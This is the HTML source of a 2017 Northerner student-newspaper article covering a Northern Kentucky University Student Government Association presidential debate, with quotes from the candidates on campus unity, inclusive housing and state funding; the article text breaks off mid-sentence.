<!DOCTYPE html>
<html style="margin:0px!important;">
<head>
<meta name="viewport" content="width=device-width,maximum-scale=1.0" />
<meta name="apple-mobile-web-app-capable" content="yes">
<link rel="stylesheet" media="screen" href="http://www.thenortherner.com/wp-content/themes/snoflex/tools/superfish/css/superfish.css" />  
<link rel="Shortcut Icon" href="http://www.thenortherner.com/wp-content/uploads/2015/10/200.png" type="image/x-icon" />


<script src="http://www.thenortherner.com/wp-content/themes/snoflex/javascript/jquery.min.js"></script>
<script type="text/javascript" src="http://www.thenortherner.com/wp-content/themes/snoflex/tools/superfish/js/superfish.js"></script>
<script type="text/javascript" src="http://www.thenortherner.com/wp-content/themes/snoflex/tools/superfish/js/supersubs.js"></script> 
<link rel="stylesheet" href="http://www.thenortherner.com/wp-content/themes/snoflex/tools/flexslider/flexslider.css" type="text/css">
<script src="http://www.thenortherner.com/wp-content/themes/snoflex/tools/flexslider/jquery.flexslider.js"></script>
<script src="http://www.thenortherner.com/wp-content/themes/snoflex/javascript/jquery-visible.js"></script>
<script> 
 
    $(document).ready(function(){ 
        $("ul.sf-menu").supersubs({ 
            minWidth:    12,   // minimum width of sub-menus in em units 
            maxWidth:    20,   // maximum width of sub-menus in em units 
            extraWidth:  1     // extra width can ensure lines don't sometimes turn over 
        }).superfish({
    		delay:      200,     
        	speed:		'fast'
        });  // call supersubs first, then superfish, so that subs are 
                         // not display:none when measuring. Call before initialising 
                         // containing tabs for same reason. 
    }); 

</script>
<style>


</style>
<style type="text/css" media="screen"><!-- @import url( http://www.thenortherner.com/wp-content/themes/snoflex/style.css ); --></style>

<title>The Northerner | SGA candidates make final pitch to student body</title>
<script type="text/javascript" src="http://www.thenortherner.com/wp-content/themes/snoflex/javascript/jquery-scrolltofixed-min.js"></script> 
<script type="text/javascript" src="http://www.thenortherner.com/wp-content/themes/snoflex/javascript/remodal.min.js"></script> 
 <link rel="stylesheet" href="http://www.thenortherner.com/wp-content/themes/snoflex/javascript/remodal.css"> 
 <link rel="stylesheet" href="http://www.thenortherner.com/wp-content/themes/snoflex/javascript/remodal-default-theme.css"> 
<script>

	$(function () {

		$('#gototop').click(function () {
     var bottomPosition = $(".phototop").height();
     var bottomWindow = $(window).height();
     bottomWindow = bottomWindow - 50;
     if (bottomWindow < bottomPosition) {
     	photoHeight = bottomWindow;
		 photoHeight = photoHeight -45;
     } else {
     	photoHeight = bottomPosition +35;
     }
     $('html, body').animate({
         scrollTop: $("#mainbody").offset().top-photoHeight
     }, 1000).delay();
			return false;
		});
	})

$(function() { // when the DOM is ready...
     var bottomPosition = $(".phototop").height();
     var headerHeight = $(".header").height();
     var bottomWindow = $(window).height();
     bottomWindow = bottomWindow - 50;
     if (bottomWindow < bottomPosition) {
     	photoHeight = bottomWindow;
		 photoHeight = photoHeight -45;
     } else {
     	photoHeight = bottomPosition + headerHeight;
     }
     $('html, body').animate({
         scrollTop: $("#mainbody").offset().top-photoHeight
     }, 1000).delay();
    
	 });


	
</script>
<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//platform-api.sharethis.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="The Northerner &raquo; SGA candidates make final pitch to student body Comments Feed" href="http://www.thenortherner.com/news/2017/03/28/sga-candidates-make-final-pitch-to-student-body/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.thenortherner.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.3"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
		<style type="text/css">
				</style>
	<link rel='stylesheet' id='jobman-display-css'  href='http://www.thenortherner.com/wp-content/plugins/job-manager/css/display.css?ver=0.7.25' type='text/css' media='all' />
<link rel='stylesheet' id='wp_pro_ads_style-css'  href='http://www.thenortherner.com/wp-content/plugins/wp_pro_ad_system/templates/css/wpproads.min.css?ver=4.1.2' type='text/css' media='all' />
<link rel='stylesheet' id='prettyphoto-css'  href='http://www.thenortherner.com/wp-content/plugins/prettyphoto-media/css/prettyPhoto.css?ver=3.1.4' type='text/css' media='screen' />
<link rel='stylesheet' id='farbtastic-css'  href='http://www.thenortherner.com/wp-admin/css/farbtastic.min.css?ver=1.3u1' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='http://www.thenortherner.com/wp-includes/css/dashicons.min.css?ver=4.7.3' type='text/css' media='all' />
<link rel='stylesheet' id='thickbox-css'  href='http://www.thenortherner.com/wp-includes/js/thickbox/thickbox.css?ver=4.7.3' type='text/css' media='all' />
<link rel='stylesheet' id='elusive-css'  href='http://www.thenortherner.com/wp-content/plugins/menu-icons/includes/library/icon-picker/css/types/elusive.min.css?ver=2.0' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-css'  href='http://www.thenortherner.com/wp-content/plugins/menu-icons/includes/library/icon-picker/css/types/font-awesome.min.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='foundation-icons-css'  href='http://www.thenortherner.com/wp-content/plugins/menu-icons/includes/library/icon-picker/css/types/foundation-icons.min.css?ver=3.0' type='text/css' media='all' />
<link rel='stylesheet' id='menu-icons-extra-css'  href='http://www.thenortherner.com/wp-content/plugins/menu-icons/css/extra.min.css?ver=0.10.2' type='text/css' media='all' />
<link rel='stylesheet' id='uaf_client_css-css'  href='http://www.thenortherner.com/wp-content/uploads/useanyfont/uaf.css?ver=1489422036' type='text/css' media='all' />
<link rel='stylesheet' id='wp-polls-css'  href='http://www.thenortherner.com/wp-content/plugins/wp-polls/polls-css.css?ver=2.73.2' type='text/css' media='all' />
<style id='wp-polls-inline-css' type='text/css'>
.wp-polls .pollbar {
	margin: 1px;
	font-size: 6px;
	line-height: 8px;
	height: 8px;
	background-image: url('http://www.thenortherner.com/wp-content/plugins/wp-polls/images/default/pollbg.gif');
	border: 1px solid #c8c8c8;
}

</style>
<link rel='stylesheet' id='googleFonts-css'  href='http://fonts.googleapis.com/css?family=Nixie+One%7CLato%7CMontserrat%7CMontserrat%7CMontserrat%7CLato%7CAdamina%7CMontserrat%7CLato%7CNeuton%7CGilda+Display&#038;ver=4.7.3' type='text/css' media='all' />
<link rel='stylesheet' id='upw_theme_standard-css'  href='http://www.thenortherner.com/wp-content/plugins/ultimate-posts-widget/css/upw-theme-standard.min.css?ver=4.7.3' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='http://www.thenortherner.com/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://www.thenortherner.com/wp-content/plugins/jetpack/css/jetpack.css?ver=4.7' type='text/css' media='all' />
<link rel='stylesheet' id='wp-paginate-css'  href='http://www.thenortherner.com/wp-content/plugins/wp-paginate/css/wp-paginate.css?ver=2.0.1' type='text/css' media='screen' />
<!-- This site uses the Google Analytics by MonsterInsights plugin v6.1.5 - Using Analytics tracking - https://www.monsterinsights.com/ -->
<script type="text/javascript" data-cfasync="false">
	// Function to detect opted out users
	function __gaTrackerIsOptedOut() {
		return document.cookie.indexOf(disableStr + '=true') > -1;
	}

	// Disable tracking if the opt-out cookie exists.
	var disableStr = 'ga-disable-UA-43004519-1';
	if ( __gaTrackerIsOptedOut() ) {
		window[disableStr] = true;
	}

	// Opt-out function
	function __gaTrackerOptout() {
	  document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/';
	  window[disableStr] = true;
	}

	(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
		(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
		m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	})(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker');

	__gaTracker('create', 'UA-43004519-1', 'auto');
	__gaTracker('set', 'forceSSL', true);
	__gaTracker('send','pageview');
</script>
<!-- / Google Analytics by MonsterInsights -->
<script type='text/javascript' src='http://www.thenortherner.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://www.thenortherner.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://www.thenortherner.com/wp-content/plugins/job-manager/js/display.js?ver=0.7.25'></script>
<script type='text/javascript' src='http://www.thenortherner.com/wp-content/plugins/wp_pro_ad_system/templates/js/wppas.js?ver=4.7.3'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.thenortherner.com/wp-content/plugins/jetpack/modules/related-posts/related-posts.js?ver=20150408'></script>
<script type='text/javascript' src='//platform-api.sharethis.com/js/sharethis.js#product=ga'></script>
<script type='text/javascript' src='http://www.thenortherner.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.5.2'></script>
<link rel='https://api.w.org/' href='http://www.thenortherner.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.thenortherner.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.thenortherner.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='GALLERY: Softball drops first Horizon League series of the season' href='http://www.thenortherner.com/sports/2017/03/27/gallery-softball-drops-first-horizon-league-series-of-the-season/' />
<link rel='next' title='SGA elections underway: Who are the candidates?' href='http://www.thenortherner.com/news/2017/03/28/sga-elections-underway-who-are-the-candidates/' />
<meta name="generator" content="WordPress 4.7.3" />
<link rel="canonical" href="http://www.thenortherner.com/news/2017/03/28/sga-candidates-make-final-pitch-to-student-body/" />
<link rel='shortlink' href='http://wp.me/p8qcV4-faK' />
<link rel="alternate" type="application/json+oembed" href="http://www.thenortherner.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.thenortherner.com%2Fnews%2F2017%2F03%2F28%2Fsga-candidates-make-final-pitch-to-student-body%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.thenortherner.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.thenortherner.com%2Fnews%2F2017%2F03%2F28%2Fsga-candidates-make-final-pitch-to-student-body%2F&#038;format=xml" />
    <style type="text/css" media="screen">
          div.printfriendly a, div.printfriendly a:link, div.printfriendly a:hover, div.printfriendly a:visited {
            text-decoration: none;
            border: none;
          }
    </style>
           <style type="text/css" media="screen">
          div.printfriendly {
            margin: 12px 12px 12px 12px;
          }
          div.printfriendly a, div.printfriendly a:link, div.printfriendly a:visited {
            font-size: 14px;
            color: #6D9F00;
            vertical-align: bottom;
          }
          .printfriendly a {
            box-shadow:none;
          }
          .printfriendly a:hover {
            cursor: pointer;
          }
          .printfriendly a img  {
            border: none;
            padding:0;
            margin-right: 6px;
            box-shadow: none;
            -webkit-box-shadow: none;
            -moz-box-shadow: none;
          }
          .printfriendly a span{
            vertical-align: bottom;
          }
          .pf-alignleft {
            float: left;
          }
          .pf-alignright {
            float: right;
          }
          div.pf-aligncenter {
            display: block;
            margin-left: auto;
            margin-right: auto;
            text-align: center;
          }
        </style>
        <style type="text/css" media="print">
          .printfriendly {
            display: none;
          }
        </style>

<link rel='dns-prefetch' href='//v0.wordpress.com'>
<link rel='dns-prefetch' href='//i0.wp.com'>
<link rel='dns-prefetch' href='//i1.wp.com'>
<link rel='dns-prefetch' href='//i2.wp.com'>
<style type='text/css'>img#wpstats{display:none}</style>
	<meta property="og:title" content="SGA candidates make final pitch to student body" />
	<meta property="og:type" content="article" />
	<meta name="author" content="Cole Grecco" />
	<meta property="og:url" content="http://www.thenortherner.com/news/2017/03/28/sga-candidates-make-final-pitch-to-student-body/" />
	<meta property="og:image" content="https://i2.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/crowd1sno.jpg?fit=900%2C600" />
	<meta property="og:image:width" content="900" />
	<meta property="og:image:height" content="600" />
	<meta property="og:site_name" content="The Northerner" />
	<meta property="og:description"
          content="All three Student Government Association presidential candidates and their vice presidents worked to sway voters in their favor, discussing topics ranging from state funding for the university, sexual assault and rape culture to inclusiveness on campus during Monday’s debate. About 50 people watched the debate moderated by The Northerner’s Mackenzie Manley and Nicole Browning, in..." />
	<meta property="article:section" content="Featured Story" />
	<meta property="article:tag" content="" />
<!-- End of Facebook Meta Tags -->
<meta name="title" content="SGA candidates make final pitch to student body | The Northerner" />
<meta name="description" content="All three Student Government Association presidential candidates and their vice presidents worked to sway voters in their favor, discussing topics ranging from state funding for the university, sexual assault and rape culture to inclusiveness on campus during Monday’s debate. About 50 people watched the debate moderated by The Northerner’s Mackenzie Manley and Nicole Browning, in&hellip;" />

<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="article" />
<meta property="og:title" content="SGA candidates make final pitch to student body" />
<meta property="og:url" content="http://www.thenortherner.com/news/2017/03/28/sga-candidates-make-final-pitch-to-student-body/" />
<meta property="og:description" content="All three Student Government Association presidential candidates and their vice presidents worked to sway voters in their favor, discussing topics ranging from state funding for the university, sex…" />
<meta property="article:published_time" content="2017-03-28T17:14:57+00:00" />
<meta property="article:modified_time" content="2017-03-28T17:14:57+00:00" />
<meta property="og:site_name" content="The Northerner" />
<meta property="og:image" content="https://i2.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/crowd1sno.jpg?fit=1200%2C800" />
<meta property="og:image:width" content="1200" />
<meta property="og:image:height" content="800" />
<meta property="og:locale" content="en_US" />
<meta name="twitter:image" content="https://i2.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/crowd1sno.jpg?fit=1200%2C800&#038;w=640" />
<meta name="twitter:card" content="summary_large_image" />
<!-- Google Analytics Tracking by Google Analyticator 6.5.2: http://www.videousermanuals.com/google-analyticator/ -->
<script type="text/javascript">
    var analyticsFileTypes = [''];
    var analyticsSnippet = 'disabled';
    var analyticsEventTracking = 'enabled';
</script>
<script type="text/javascript">
	(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
	ga('create', 'UA-43004519-1', 'auto');
 
	ga('send', 'pageview');
</script>
			<!-- Easy Columns 2.1.1 by Pat Friedl http://www.patrickfriedl.com -->
			<link rel="stylesheet" href="http://www.thenortherner.com/wp-content/plugins/easy-columns/css/easy-columns.css" type="text/css" media="screen, projection" />
			<!-- wp thread comment 1.4.9.4.002 -->
<style type="text/css" media="screen">

.editComment, .editableComment, .textComment{
	display: inline;
}
.comment-childs{
	border: 1px solid #999;
	margin: 5px 2px 2px 4px;
	padding: 4px 2px 2px 4px;
	background-color: white;
}
.chalt{
	background-color: #E2E2E2;
}
#newcomment{
	border:1px dashed #777;width:90%;
}
#newcommentsubmit{
	color:red;
}
.adminreplycomment{
	border:1px dashed #777;
	width:99%;
	margin:4px;
	padding:4px;
}
.mvccls{
	color: #999;
}
			
</style>
<style type="text/css" media="screen">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</style></head>
<body>


<div id="lf_wrap">
<div id="sno_longform">

		<style>
				#wpadminbar {display:none!important;}
			</style><div class="header"><div class="altheader-menu"><div id="hover-menu"><div class="sno-menu menu-icon dashicons dashicons-menu"></div><div class="sno-menu close-icon foundation-icons fi-x" style="display:none;"></div></div></div><div class="lf_headerleft"><a href="/"><img src="http://www.thenortherner.com/wp-content/uploads/2016/08/facebookxx-475x475.jpg" alt="The Independent Student Newspaper of Northern Kentucky University." /></a></div><div class="socialmedia"><div class="sharing sharing-top"><a class="modal-share" href="https://www.facebook.com/sharer/sharer.php?u=http%3A%2F%2Fwww.thenortherner.com%2Fnews%2F2017%2F03%2F28%2Fsga-candidates-make-final-pitch-to-student-body%2F" title="Share on Facebook" target="_blank"><div aria-hidden="true" class="sharing-icon sharing-mobile sno-facebook dashicons dashicons-facebook-alt sno-dark sharing-mobile-hide"><span class="icon-hidden-text">Share on Facebook</span></div></a><a class="modal-share" href="https://twitter.com/intent/tweet?text=SGA+candidates+make+final+pitch+to+student+body&amp;url=http%3A%2F%2Fwp.me%2Fp8qcV4-faK" title="Tweet This Story" target="_blank"><div aria-hidden="true" class="sharing-icon sharing-mobile sno-twitter dashicons dashicons-twitter sno-dark sharing-mobile-hide"><span class="icon-hidden-text">Share on Twitter</span></div></a><a aria-hidden="true" data-remodal-target="modal"><div class="sharing-icon sno-email dashicons dashicons-email-alt sno-dark sharing-mobile-hide"><span class="icon-hidden-text">Share via Email</span></div></a></div>			<script type="text/javascript">
				$(document).ready(function() {
					$(function(){
						$('.modal-share').click(function() {
							var inst = $('[data-remodal-id=modal-share]').remodal();
							inst.open();

							var sharestoryid = '58326';

							$.ajax({
	                			url:"/wp-admin/admin-ajax.php",
								type:'POST',
								data:'action=sharestory&sharestoryid=' + sharestoryid,
								success:function(results)
	            					{ $("#suggestedstories").replaceWith(results); }
	           				});

						});
										
					});
				});
			</script>

			<div class="remodal" data-remodal-id="modal-share" data-remodal-options="hashTracking: false, closeOnConfirm: false">
  				<button data-remodal-action="close" class="remodal-close"><span class="icon-hidden-text">Close Modal Window</span></button>
  				<div id="suggestedstories">
  				<h1>Hang on for a minute...we're trying to find some more stories you might like.</h1>
  				<form method="post" action="">

  				<br />
  				<button data-remodal-action="cancel" class="remodal-cancel">Close</button>

  				</form>
  				</div>
			</div>

					<div class="remodal" data-remodal-id="modal" data-remodal-options="hashTracking: false, closeOnConfirm: false">
  				<button data-remodal-action="close" class="remodal-close"><span class="icon-hidden-text">Close Modal Window</span></button>
  				<div id="emailstoryform">
  				<h1>Email This Story</h1>
  				<form method="post" action="">
  				<label for="email_to_Bar" style="display:none;">Send email to this address</label>
  				<input type="text" id="email_to_Bar" name="email_to_Bar" class="sno_email_fields" placeholder="Send email to this address"><br />
  				
  				<label for="email_from_Bar" style="display:none;">Enter Your Name</label>
  				<input type="text" id="email_from_Bar" name="email_from_Bar" class="sno_email_fields" placeholder="Enter Your Name"><br />
  				
  				<label for="email_comment_Bar" style="display:none;">Add a comment here</label>
  				<textarea rows="4" id="email_comment_Bar" name="email_comment_Bar" class="sno_email_fields" placeholder="Add a comment here (optional)."></textarea><br />
  				
  				<label for="human_Bar" style="display:none;">Verification</label>
  				<input type="text" id="human_Bar" name="human_Bar" class="sno_email_fields" placeholder="What's 6 + 4?"><br />

  				<br />
  				<button id="submit_email_Bar" data-remodal-action="confirm" class="remodal-confirm">Send Email</button>
  				<button data-remodal-action="cancel" class="remodal-cancel">Cancel</button>
  				<input type="hidden" id="sno_email_submission_form" name="sno_email_submission_form" value="7894d3a9db" /><input type="hidden" name="_wp_http_referer" value="/news/2017/03/28/sga-candidates-make-final-pitch-to-student-body/" />
  				</form>
  				</div>
			</div>
										<script>
								$(document).ready(function() {

								$(function(){
           							$('#submit_email_Bar').click(function(){
											var storyid = '58326';
											var datastring = '';
											if ($("#email_to_Bar").length > 0){
												var email_to = $('input[name=email_to_Bar]');
												datastring += '&email_to=' + encodeURIComponent(email_to.val());
       										}

											if ($("#email_from_Bar").length > 0){
												var email_from = $('input[name=email_from_Bar]');
												datastring += '&email_from=' + encodeURIComponent(email_from.val());
       										}

											if ($("#email_comment_Bar").length > 0){
												var email_comment = $('textarea[name=email_comment_Bar]');
												datastring += '&email_comment=' + encodeURIComponent(email_comment.val());
       										}

											if ($("#human_Bar").length > 0){
												var human = $('input[name=human_Bar]');
												datastring += '&human=' + encodeURIComponent(human.val());
       										}
       										
	   										datastring += '&humanity=' + 10;

       										var verification = $('input[name=sno_email_submission_form]');
	   										datastring += '&verification=' + verification.val();
       										
										//	var parentid = '';
               							$.ajax({
                				            url:"/wp-admin/admin-ajax.php",
                				            type:'POST',
                				            data:'action=emailstory&storyid=' + storyid + datastring,
 	            				            success:function(results)
	            				            { $("#emailstoryform").replaceWith(results); }
	           				    	  	});
	         						});
								});
								});

							</script>

			</div><div id="back-top"><a id="snotop" href="#top" title="Return to Top"><div class="sno-arrow-up fa fa-arrow-up"></div></a></div></div>
<div id="storypage">
<div id="altheader-searchbox"><ul id="slidemenu" class="mobile-menu"><div class="clear"></div><div class="border-spacer"></div><li class="mobile-search"><form method="get" id="searchform-alt" action="http://www.thenortherner.com/">
									<label for="s" class="assistive-text">Search</label>
									<input type="text" class="field" name="s" id="s-alt" placeholder="Search" onfocus="this.placeholder = ''" onblur="this.placeholder = 'Search'"/>
									<input type="submit" class="submit" name="submit" id="searchsubmit" value="Search" />
								</form></li><div class="clear"></div><div class="mobile-menu"><ul id="menu-mobile" class="menu"><li id="menu-item-53997" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-53997"><a href="http://www.thenortherner.com/category/feature-on-homepage/">Featured Stories</a></li>
<li id="menu-item-53994" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-53994"><a href="http://www.thenortherner.com/category/news/">News</a></li>
<li id="menu-item-53995" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-53995"><a href="http://www.thenortherner.com/category/sports/">Sports</a></li>
<li id="menu-item-53992" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-53992"><a href="http://www.thenortherner.com/category/arts-and-life/">Arts &#038; Life</a></li>
<li id="menu-item-53996" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-53996"><a href="http://www.thenortherner.com/category/video/">Video</a></li>
<li id="menu-item-53993" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-53993"><a href="http://www.thenortherner.com/category/multimedia-2/">Multimedia</a></li>
<li id="menu-item-54071" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-54071"><a href="http://www.thenortherner.com/fall-2016/">2016 Print Editions</a></li>
<li id="menu-item-54041" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-54041"><a href="http://www.thenortherner.com/contact-us/">Contact Us</a></li>
<li id="menu-item-54042" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-54042"><a href="http://www.thenortherner.com/contribute/">Contribute</a></li>
</ul></div></ul></div>
			        <div class="phototop">
        	<img src="https://i2.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/crowd1sno.jpg?fit=5562%2C3708" style="width:100%" />
		</div>
        <div id="mainbody">
	
			<div class="content main"><h1 id="storyheadline" class="storyheadline">SGA candidates make final pitch to student body</h1><div class="dividingline"></div><p class="byline"> <a href="http://www.thenortherner.com/staff/?writer=Cole%20Grecco">Cole Grecco</a>, News Editor</p><p class="longdate"><span class="time-wrapper">March 28, 2017</span></p><div class="leftside storybody"><div class="pf-content"><p id='graph1'><span style="font-weight: 400;">All three Student Government Association presidential candidates and their vice presidents worked to sway voters in their favor, discussing topics ranging from state funding for the university, sexual assault and rape culture to inclusiveness on campus during Monday’s debate.</span></p>
<p id='graph2'><span style="font-weight: 400;">About 50 people watched the debate moderated by The Northerner’s Mackenzie Manley and Nicole Browning, in the Student Union.</span></p>
<p id='graph3'><span style="font-weight: 400;">The night kicked off with the candidates being asked about the issue of unity on NKU’s campus.</span></p>
<p id='graph4'><span style="font-weight: 400;">Kaitlyn Schaefer and Taylor Gagné said their campaign wanted to bring back the NKU ROCKS Living-Learning Community and further promote the Flex Housing option.</span></p>
<p id='graph5'><span style="font-weight: 400;">“If we can actually promote that program, which is a program where people can live together regardless of their gender, which we believe helps our LGBTQIA+ community feel more comfortable with their living situation and their communities,” Gagné said.</span></p>
<div id="attachment_58316" style="width: 485px" class="wp-caption alignleft"><a href="https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/rawlingscornes1sno.jpg"><img data-attachment-id="58316" data-permalink="http://www.thenortherner.com/news/2017/03/28/sga-candidates-make-final-pitch-to-student-body/attachment/rawlingscornes1sno/" data-orig-file="https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/rawlingscornes1sno.jpg?fit=4771%2C3181" data-orig-size="4771,3181" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;5&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;NIKON D3300&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1490635095&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;46&quot;,&quot;iso&quot;:&quot;4000&quot;,&quot;shutter_speed&quot;:&quot;0.0125&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="rawlingscornes1sno" data-image-description="" data-medium-file="https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/rawlingscornes1sno.jpg?fit=475%2C317" data-large-file="https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/rawlingscornes1sno.jpg?fit=900%2C600" class="wp-image-58316 size-medium" src="https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/rawlingscornes1sno.jpg?resize=475%2C317" alt="" srcset="https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/rawlingscornes1sno.jpg?resize=475%2C317 475w, https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/rawlingscornes1sno.jpg?resize=768%2C512 768w, https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/rawlingscornes1sno.jpg?resize=900%2C600 900w, https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/rawlingscornes1sno.jpg?resize=122%2C80 122w, https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/rawlingscornes1sno.jpg?resize=300%2C200 300w, https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/rawlingscornes1sno.jpg?w=2000 2000w, https://i0.wp.com/www.thenortherner.com/wp-content/uploads/2017/03/rawlingscornes1sno.jpg?w=3000 3000w" sizes="(max-width: 475px) 100vw, 475px" data-recalc-dims="1" /></a><p class="wp-caption-text">Rawlings and Cornes are running under the slogan &#8220;True to NKYOU.&#8221; She pointed toward keeping the administration accountable for implementing ideas of unity and inclusion.</p></div>
<p id='graph7'>&nbsp;</p>
<p id='graph8'><span style="font-weight: 400;">Dejah Rawlings and Troy Cornes also said they felt NKU did need to bring back the ROCKS LLC, but in addition, the staff needs to be trained to deal with those diverse groups.</span></p>
<p id='graph9'><span style="font-weight: 400;">Rawlings noted as well that unity on campus starts at the administration level.</span></p>
<p id='graph10'><span style="font-weight: 400;">“If students don&#8217;t see that the administration is pushing for unity then they’re not going to want to push for it,” Rawlings said.</span></p>
<p id='graph11'><span style="font-weight: 400;">For Sami Dada and Erica Bluford, unity at NKU comes from building relationships.</span></p>
<p id='graph12'><span style="font-weight: 400;">“When I came in I wanted to branch out to a bunch of organizations and a lot of students want to do that too, but they don&#8217;t feel like they have either friends or they feel like they need to know someone to be able to get involved,” Dada said. “So start building relationships finding ways where we can kind of band together.”</span></p>
<p id='graph13'><span style="font-weight: 400;">State funding recently became a hot topic specifically for SGA after they sent about 30 students to Frankfort t</span></p>
